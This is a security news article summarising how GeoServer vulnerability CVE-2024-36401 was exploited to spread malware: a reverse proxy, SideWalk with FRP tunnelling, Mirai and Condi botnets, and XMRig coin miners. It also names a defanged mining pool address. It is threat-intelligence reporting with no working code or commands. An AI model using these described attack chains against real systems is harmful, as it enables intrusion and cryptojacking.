GeoServer versions prior to 2.23.6, 2.24.4, and 2.25.2 are susceptible to remote code execution, where attackers can exploit this critical vulnerability to gain unauthorized access to and control of vulnerable systems.
It has a critical vulnerability (CVE-2024-36401) that allows unauthenticated attackers to execute arbitrary code remotely by exploiting unsafe XPath evaluation in OGC request parameters, which has been resolved in the latest versions (2.23.6, 2.24.4, and 2.25.2).
On July 15, a critical vulnerability in OSGeo GeoServer GeoTools was exploited to spread malware. Botnets and miner groups quickly targeted this flaw, while GOREVERSE attempted to establish a command-and-control connection to execute malicious actions.
An attacker exploits CVE-2024-36401 to deploy GOREVERSE, a malicious reverse proxy server, on compromised systems. GOREVERSE connects to a non-standard port on a predefined attacker-controlled server.
SideWalk malware fetches a script from a remote server and uses XOR decryption to decode a next-stage payload and configuration data. The configuration data contains C2 information and is decrypted using the ChaCha20 algorithm with a hardcoded key.
It establishes a secure C2 connection using ChaCha20 encryption, which downloads a customized configuration file for Fast Reverse Proxy (FRP), a legitimate tool used for obfuscating malicious network traffic.
FRP creates an encrypted tunnel to a remote server, allowing the attackers to maintain persistent control over the compromised system. The malware’s geographical targeting suggests a wide-scale attack campaign targeting vulnerabilities prevalent in South America, Europe, and Asia.
The JenX Mirai variant downloads a malicious file from a specified URL, extracts its configuration data using XOR decryption, and attempts to connect to a C2 server. It also contains a hard-coded payload targeting the Huawei router vulnerability CVE-2017-17215, which attempts to download additional malware.
Condi botnet, downloaded from a remote server, targets various CPU architectures and launches DDoS attacks by using wget to fetch binaries, executes them, and connects to a C2 server for commands.
The botnet employs different attack methods, including TCP, UDP, and VSE flooding. Additionally, it contains backdoor functionalities to execute remote commands and gather host information.
A malicious script downloaded from a remote URL gathers system info, uninstalls cloud platform monitoring agents, disables security processes, and then deploys a coin miner targeting specific mining pools.
An attacker initiates a coin miner attack by downloading a Base64-encoded script from a malicious website, then downloads a coin miner named “linuxsys” and a configuration file named “config(.)json” from an AWS S3 bucket controlled by the attacker.
According to Fortinet, the configuration file sets the pool URL “pool(.)supportxmr.()com:80” with credentials, and the miner itself is XMRig.
A remote script download attempt was detected, which likely a coin miner, downloads from a suspicious server, gains execution permission, and removes files from system directories.
The “check.sh” script prepares the victim’s system for cryptojacking by creating directories and verifying infection status. If clear, it downloads a configuration script (“config.sh”) and XMRig miner, likely from the attacker’s IP and Github, respectively.
GeoServer’s open-source nature exposes it to vulnerabilities. While a patch has been applied to mitigate one specific vulnerability, comprehensive cybersecurity measures, including regular updates, threat detection, and strict access controls, are essential to protect GeoServer environments from potential threats and ensure the security of data infrastructure.
